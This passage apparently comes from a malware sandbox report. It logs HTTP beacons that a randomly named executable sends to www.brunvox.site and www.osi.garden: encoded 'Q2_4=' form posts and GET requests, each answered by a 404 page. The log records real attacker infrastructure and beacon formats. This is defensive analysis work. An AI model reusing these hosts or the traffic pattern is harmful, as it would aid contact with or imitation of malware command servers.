                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.brunvox.site
                                                                                                              Origin: http://www.brunvox.site
                                                                                                              Referer: http://www.brunvox.site/3qrm/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 67 77 32 6d 33 4d 38 58 37 33 44 47 56 32 6e 53 33 7a 45 4e 61 77 47 73 4a 42 32 39 79 70 6b 76 77 7a 54 46 30 68 77 79 6a 6a 76 6c 55 6f 31 47 41 31 34 6d 50 77 65 4b 4a 45 41 38 6f 36 47 65 37 5a 63 32 72 71 33 79 41 38 39 33 6b 51 78 4f 62 45 57 6a 6f 74 37 36 39 53 2f 41 4a 61 33 2f 79 5a 72 6c 73 48 70 31 47 4e 6a 67 4e 4c 48 53 63 4f 78 67 78 73 54 6a 61 51 33 34 49 6b 76 55 67 73 59 4c 49 46 62 69 34 2f 4e 4d 6f 78 55 62 49 32 37 50 36 35 63 65 36 49 34 52 4b 4d 56 46 66 6a 34 76 62 48 6b 6e 36 44 75 6e 67 77 67 4c 72 74 41 32 47 66 4d 4e 36 72 61 41 30 33 38 34 7a 67 3d 3d
                                                                                                              Data Ascii: Q2_4=gw2m3M8X73DGV2nS3zENawGsJB29ypkvwzTF0hwyjjvlUo1GA14mPweKJEA8o6Ge7Zc2rq3yA893kQxObEWjot769S/AJa3/yZrlsHp1GNjgNLHScOxgxsTjaQ34IkvUgsYLIFbi4/NMoxUbI27P65ce6I4RKMVFfj4vbHkn6DungwgLrtA2GfMN6raA0384zg==
                                                                                                              Nov 5, 2024 15:35:27.504525900 CET896INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:35:27 GMT
                                                                                                              Server: Apache
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Content-Length: 690
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c [TRUNCATED]
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              22192.168.11.2049763203.161.41.204804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:35:29.998555899 CET743OUTPOST /3qrm/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.brunvox.site
                                                                                                              Origin: http://www.brunvox.site
                                                                                                              Referer: http://www.brunvox.site/3qrm/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 67 77 32 6d 33 4d 38 58 37 33 44 47 55 58 58 53 78 67 73 4e 53 77 47 6a 4d 42 32 39 34 4a 6b 72 77 7a 66 46 30 67 31 76 6a 52 37 6c 55 4a 46 47 48 45 34 6d 4d 77 65 4b 42 6b 41 35 6e 61 48 63 37 5a 51 51 72 72 62 79 41 38 35 33 6b 56 56 4f 61 33 4f 67 6f 39 37 38 30 79 2f 43 52 36 33 2f 79 5a 72 6c 73 48 38 69 47 4c 4c 67 4f 34 50 53 63 76 78 6e 76 63 54 38 64 51 33 34 66 30 76 51 67 73 5a 63 49 41 37 59 34 39 31 4d 6f 78 45 62 49 6e 37 4d 78 35 63 63 30 6f 35 6a 61 70 49 35 51 67 6f 55 59 58 70 2b 79 78 43 2b 6f 47 78 52 32 66 30 53 46 4d 51 2f 2b 62 6a 6f 32 31 39 6a 75 69 72 69 2f 2b 38 6e 46 55 56 6c 77 4a 71 4f 39 32 69 2b 42 52 34 3d
                                                                                                              Data Ascii: Q2_4=gw2m3M8X73DGUXXSxgsNSwGjMB294JkrwzfF0g1vjR7lUJFGHE4mMweKBkA5naHc7ZQQrrbyA853kVVOa3Ogo9780y/CR63/yZrlsH8iGLLgO4PScvxnvcT8dQ34f0vQgsZcIA7Y491MoxEbIn7Mx5cc0o5japI5QgoUYXp+yxC+oGxR2f0SFMQ/+bjo219juiri/+8nFUVlwJqO92i+BR4=
                                                                                                              Nov 5, 2024 15:35:30.185868025 CET896INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:35:30 GMT
                                                                                                              Server: Apache
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Content-Length: 690
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c [TRUNCATED]
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              23192.168.11.2049764203.161.41.204804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:35:32.703387022 CET2578OUTPOST /3qrm/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.brunvox.site
                                                                                                              Origin: http://www.brunvox.site
                                                                                                              Referer: http://www.brunvox.site/3qrm/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 67 77 32 6d 33 4d 38 58 37 33 44 47 55 58 58 53 78 67 73 4e 53 77 47 6a 4d 42 32 39 34 4a 6b 72 77 7a 66 46 30 67 31 76 6a 52 6a 6c 55 66 35 47 41 54 6b 6d 43 51 65 4b 64 30 41 34 6e 61 47 45 37 5a 59 4d 72 71 6e 45 41 2f 4e 33 6c 7a 5a 4f 64 47 4f 67 37 64 37 38 35 53 2f 42 4a 61 33 71 79 5a 62 68 73 48 73 69 47 4c 4c 67 4f 2b 72 53 61 2b 78 6e 74 63 54 6a 61 51 33 2f 49 6b 75 33 67 74 77 70 49 41 33 49 74 64 56 4d 70 56 59 62 4b 56 6a 4d 38 35 63 61 35 49 35 37 61 70 4d 63 51 67 30 70 59 58 4d 56 79 33 43 2b 6f 41 59 35 78 73 45 45 63 4d 51 45 6a 72 2b 65 77 58 6c 4e 6a 69 6a 31 78 4f 73 72 4f 69 5a 79 31 35 61 6d 70 55 57 76 66 33 2f 44 75 34 46 49 4e 4b 75 73 2b 4c 74 4c 4e 57 32 77 62 67 6f 4e 6b 59 4d 69 43 62 71 68 54 68 6d 31 65 4e 68 57 2b 4d 59 7a 4d 49 2b 73 46 6b 53 72 4b 59 58 52 4a 6c 62 69 6e 30 47 64 43 72 49 46 49 36 56 79 36 6b 58 34 68 39 57 47 46 6f 68 7a 47 36 41 66 32 49 34 44 59 51 48 61 6d 4c 74 6c 51 4b 7a 68 61 62 47 37 55 4a 39 46 38 6d 35 48 70 65 35 6e 76 [TRUNCATED]
                                                                                                              Data Ascii: Q2_4=gw2m3M8X73DGUXXSxgsNSwGjMB294JkrwzfF0g1vjRjlUf5GATkmCQeKd0A4naGE7ZYMrqnEA/N3lzZOdGOg7d785S/BJa3qyZbhsHsiGLLgO+rSa+xntcTjaQ3/Iku3gtwpIA3ItdVMpVYbKVjM85ca5I57apMcQg0pYXMVy3C+oAY5xsEEcMQEjr+ewXlNjij1xOsrOiZy15ampUWvf3/Du4FINKus+LtLNW2wbgoNkYMiCbqhThm1eNhW+MYzMI+sFkSrKYXRJlbin0GdCrIFI6Vy6kX4h9WGFohzG6Af2I4DYQHamLtlQKzhabG7UJ9F8m5Hpe5nvLX6s72vw/CvI9HsA2bFSy0Zqd/ghy6HCeMTKcrcT/JJ/fA5gCCYl6OniwykmFE8F/wC6Wb7OTw7qKVcXqt9M0Pbk68ElUk8NjBJfTT22MRVr+SecM+Kf5/y8EOtncHK2qvEhNNYKWGd2cceyV/hWpaOjcEj96yKeLZqjPHZ5Tur+J8B6dBXe23B5zD0WjeuDD9xtv51ABGRkNwD+R+X+ttHjWyMx9Ld6IRv3pZ5F3NfMnSUsihcsx9ZzpcWTrHF6dXPkGHmkrrdccF57VF5mluikZbK0XbzO71+ciTwyTmvHuZgWujfN1NqLqGcF81Ey3i3suLu3z/HuCor09lZePeZ2GQmSXRhdHkbQJWCNjrcP+oVFKQhl6sdArSy3UmMa+t7v57bSNZu4VB7SmXv6WB44G+ygqTpK8JdnFQfJjKWn5XqJzahFubLoVC+ZV48KLVf3ZVJMHiDXsAyUR9SRuY1fONxIFLLbISj7lNMKdrq3KoOXMDr7WAmuXwcB8NyxEuMoccQBobQcQRjGH2L/h5B+VAZ5G4X222pQqPqwwCurtlDHaQCGhbXuNbKVB7rLwc7x3VncVvlxS/ZGBpQmEBBD2cC3Dvt0GgAY19jYRPUi+Z8V3sS5v2Ew18uCSUvDR3phvKrU378nn9Z599gypekwO8yPDDJCZO [TRUNCATED]
                                                                                                              Nov 5, 2024 15:35:32.703443050 CET3867OUTData Raw: 5a 56 76 41 45 38 36 75 63 38 57 69 75 50 42 4f 33 46 75 78 7a 45 5a 4d 69 51 47 54 58 4c 37 54 72 54 4d 53 6c 73 67 4c 72 56 4a 57 71 7a 50 6e 62 79 34 33 42 48 71 6c 37 32 76 6e 6f 2b 45 4f 43 2f 6f 71 53 58 46 58 54 79 33 6a 52 6a 63 38 4e 70
                                                                                                              Data Ascii: ZVvAE86uc8WiuPBO3FuxzEZMiQGTXL7TrTMSlsgLrVJWqzPnby43BHql72vno+EOC/oqSXFXTy3jRjc8NpxwfuwWFtZphnX4JH9oXzxtjyTLruNqKeZl1oMYSwsogzKS9WaStS0Gn1gjewCggvgTfj+wpQ1cgsEceqodl1EzM7YVdUH7npWVskQzRDB8uhYzcXsXfDzpD/YgCZqSjz9cRrvM/YWw8GNbSzKqq/1u6pkUykoUDOM
                                                                                                              Nov 5, 2024 15:35:32.703473091 CET1447OUTData Raw: 76 6e 78 30 36 52 6e 6f 67 4b 47 75 33 71 72 61 4a 6e 77 6f 69 6e 30 70 75 4a 4e 35 30 30 72 57 6b 4e 78 2b 76 72 4c 6e 57 50 51 6d 37 58 65 31 71 2b 51 79 43 65 49 65 52 33 48 35 6d 53 53 62 4f 4f 4a 33 75 68 46 30 30 55 77 53 45 69 6c 69 68 55
                                                                                                              Data Ascii: vnx06RnogKGu3qraJnwoin0puJN500rWkNx+vrLnWPQm7Xe1q+QyCeIeR3H5mSSbOOJ3uhF00UwSEilihU643yREnRBaqL31xvVDiCAOGAcYfCoLWg1pPNkETL+T0BippY4hZYTDl26J8CVLyygu3uKLg0ieyWq6hAYD1Owdlu7KAjkbXQjQD0mOS1hoZsYhuVclBhlleHp7vFEdQhTfspWdSMW9w6FAZel+86D3TCrtsYWa+Am
                                                                                                              Nov 5, 2024 15:35:32.898757935 CET896INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:35:32 GMT
                                                                                                              Server: Apache
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Content-Length: 690
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c [TRUNCATED]
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              24192.168.11.2049765203.161.41.204804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:35:35.417129993 CET456OUTGET /3qrm/?Q2_4=tyeG08MV0U64WH6unwcOXR2sJCf/xqZR+j/9sSFSjjXbCPJ8dUZ7AUStEW8oibqh5p8I6M3vE8IgylEGfxaCpffC+Ti1QKudju6yjlF7VN/fdeOaTvtkuuM=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.brunvox.site
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:35:35.603905916 CET911INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:35:35 GMT
                                                                                                              Server: Apache
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Content-Length: 690
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c [TRUNCATED]
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              25192.168.11.204976668.65.122.222804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:35:40.910063028 CET717OUTPOST /gqtu/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.osi.garden
                                                                                                              Origin: http://www.osi.garden
                                                                                                              Referer: http://www.osi.garden/gqtu/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 53 34 2b 42 32 4b 56 42 2f 45 2b 4c 4a 44 70 4b 59 67 43 35 4e 2f 6e 75 6f 76 66 44 75 38 46 48 34 6a 53 4b 6e 4d 50 72 75 78 6c 59 39 6d 36 77 33 77 74 65 66 6d 70 2f 62 65 63 45 6a 67 44 5a 68 4f 6a 57 36 7a 74 32 72 7a 4b 63 76 2f 70 7a 35 59 44 4b 4b 4e 46 59 64 6e 76 36 34 46 4c 78 77 4b 46 79 38 4f 37 69 61 77 67 6c 53 44 74 35 6d 4a 37 71 51 48 74 4c 67 49 35 51 42 43 34 45 75 4a 6b 4c 79 32 6a 48 58 6c 37 35 47 48 75 59 4d 56 59 54 44 55 53 78 59 2b 59 6b 76 67 43 6e 37 6e 78 44 31 57 2b 4d 55 64 59 76 71 78 62 68 52 2b 64 44 6f 38 34 4c 31 55 45 4c 70 6f 72 31 45 67 3d 3d
                                                                                                              Data Ascii: Q2_4=S4+B2KVB/E+LJDpKYgC5N/nuovfDu8FH4jSKnMPruxlY9m6w3wtefmp/becEjgDZhOjW6zt2rzKcv/pz5YDKKNFYdnv64FLxwKFy8O7iawglSDt5mJ7qQHtLgI5QBC4EuJkLy2jHXl75GHuYMVYTDUSxY+YkvgCn7nxD1W+MUdYvqxbhR+dDo84L1UELpor1Eg==
                                                                                                              Nov 5, 2024 15:35:41.091934919 CET1289INHTTP/1.1 404 Not Found
                                                                                                              keep-alive: timeout=5, max=100
                                                                                                              content-type: text/html
                                                                                                              transfer-encoding: chunked
                                                                                                              content-encoding: gzip
                                                                                                              vary: Accept-Encoding
                                                                                                              date: Tue, 05 Nov 2024 14:35:41 GMT
                                                                                                              server: LiteSpeed
                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                              connection: close
                                                                                                              Data Raw: 31 33 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a db 72 a3 ca 7a be 5f 4f 41 9c 4a b2 77 31 1e ce 12 78 db 93 00 42 80 24 10 20 81 84 52 a9 55 08 9a 83 38 8a b3 94 ca 03 e5 35 f2 64 29 64 7b 2c cb f6 9a 95 54 2e d2 37 88 fe bb bf ff fc 77 ab 9b df 7e fb ed f1 ef 26 4b 7e 6d 6b 02 14 d6 69 f2 e3 b7 c7 e7 07 04 41 d0 63 08 1c ef c7 6f 97 9f 29 a8 1d 28 ac eb e2 1e 1c 9b a8 7d ba e3 f3 ac 06 59 7d 5f 9f 0a 70 07 b9 cf 6f 4f 77 35 e8 6b 64 80 f8 1b e4 86 4e 59 81 fa a9 a9 fd 7b fa ee 4b 1c c7 0d c1 fd 30 bf cc 93 2b a0 2c bf 77 07 d2 97 13 b5 d2 09 52 e7 7f 32 43 e8 8b a8 04 d5 d5 14 f4 1d 7a e6 a4 e0 e9 ae 8d 40 57 e4 65 7d 35 ac 8b bc 3a 7c f2 40 1b b9 e0 fe f2 f2 0d 8a b2 a8 8e 9c e4 be 72 9d 04 3c 61 df 7f 42 d5 51 9d 80 1f 24 4a 42 6a 5e 43 d3 bc c9 bc 47 e4 b9 f3 d9 94 55 7d 4a 00 34 d8 ed c5 5c 6e 55 bd c8 31 98 7a 9f 7b 27 e8 df 2f 43 87 d7 a1 f9 79 56 df fb 4e 1a 25 a7 07 88 2d 23 27 f9 06 49 20 69 41 1d b9 ce 37 a8 72 b2 ea be 02 65 e4 ff ed e3 b4 2a 3a 83 07 08 23 8b fe 3d 31 89 32 70 1f [TRUNCATED]
                                                                                                              Data Ascii: 1339Zrz_OAJw1xB$ RU85d)d{,T.7w~&K~mkiAco)(}Y}_poOw5kdNY{K0+,wR2Cz@We}5:|@r<aBQ$JBj^CGU}J4\nU1z{'/CyVN%-#'I iA7re*:#=12p(N45Hy?jqP:y~+8EYND)~:o5(oEU8hnN},}r:\>[#MwC=TEU>FWjzU;uSn&_.Sqz_JM~(7_E/SyXI>3UNe7A\q`IWhWZJ|jV70?#GC*E[*3v8uMWxkp5gjq9_yW^?wkQ{9BdFo^uufl(Oj^UeY>PU#_)?M&F,?*{O;Ido77yq,U}:*eLv9Q7MZ~AN]NSZUlA9W$|-?]>'z:FF7/|7?v/8]VR>t&$F/)"Keh<7ln< q [TRUNCATED]
                                                                                                              Nov 5, 2024 15:35:41.092016935 CET1289INData Raw: 0f 50 18 79 1e c8 3e 8e b8 5a 9f 2e 91 fd 9c d7 ef c7 bd 99 73 c0 bc 15 ed d3 55 64 18 f8 33 2b 3e 56 f9 1b c4 4b 25 fd 64 53 34 a0 bc 84 2f 73 bb 2f b8 81 f8 f3 59 7e 05 fa 3e d3 07 c2 d0 ae a3 f6 63 c6 fd 79 be 0f 7e 54 56 f5 bd 1b 46 89 f7 99
                                                                                                              Data Ascii: Py>Z.sUd3+>VK%dS4/s/Y~>cy~TVF/0{]s HnzB}Y/@_y,0k"1Rlc#Wy$fj!fu{U%f>L1-0f*gP?)>_<v.e)o{#[dqKCb
                                                                                                              Nov 5, 2024 15:35:41.092061043 CET1289INData Raw: 50 02 2f ea 62 11 8c d6 d9 e1 9c 6e b8 bd 39 ae 85 3e 0e ad 8e 18 9d ce 84 c4 a7 e8 51 68 85 1d c3 8f db 89 bd 03 1b 56 0f b3 79 ac 9b 22 12 8d d5 49 c6 2f 90 b0 db b7 b3 72 94 46 da 5c 5a 3b 4b 81 22 fb 82 13 cb 84 36 e4 ed 7c 8b ed 63 02 66 31
                                                                                                              Data Ascii: P/bn9>QhVy"I/rF\Z;K"6|cf1QIB4S*-t"P=:$Y=]eL/H8hXcn7L0qNPXZ;Jn9`q,%neaWP.]>g_l7&wZAC/Hk-EPm-
                                                                                                              Nov 5, 2024 15:35:41.092107058 CET1289INData Raw: 57 61 6c 80 b9 47 b4 a3 71 a6 31 ae 3a 99 49 6d 3e 81 e1 de 6b 8b bc dd ce f9 82 5a f9 b9 d8 4b d5 01 3d 4d 61 b9 93 cc a6 1a 57 a9 15 d2 b2 64 89 72 37 ab 17 a7 71 a3 8e 34 80 74 6c 56 72 fd 32 63 9d 93 bc 5a 6c 62 9d ee 72 6e 7e 32 60 d8 33 d7
                                                                                                              Data Ascii: WalGq1:Im>kZK=MaWdr7q4tlVr2cZlbrn~2`3U#]Ea/k}4FeN}N@YNJmLVSVt\nDOg>wNd9-zfx65D"rWg`"HEfSEd,h[X{/6C]s:{&nmLxlZN8d^d0Zl
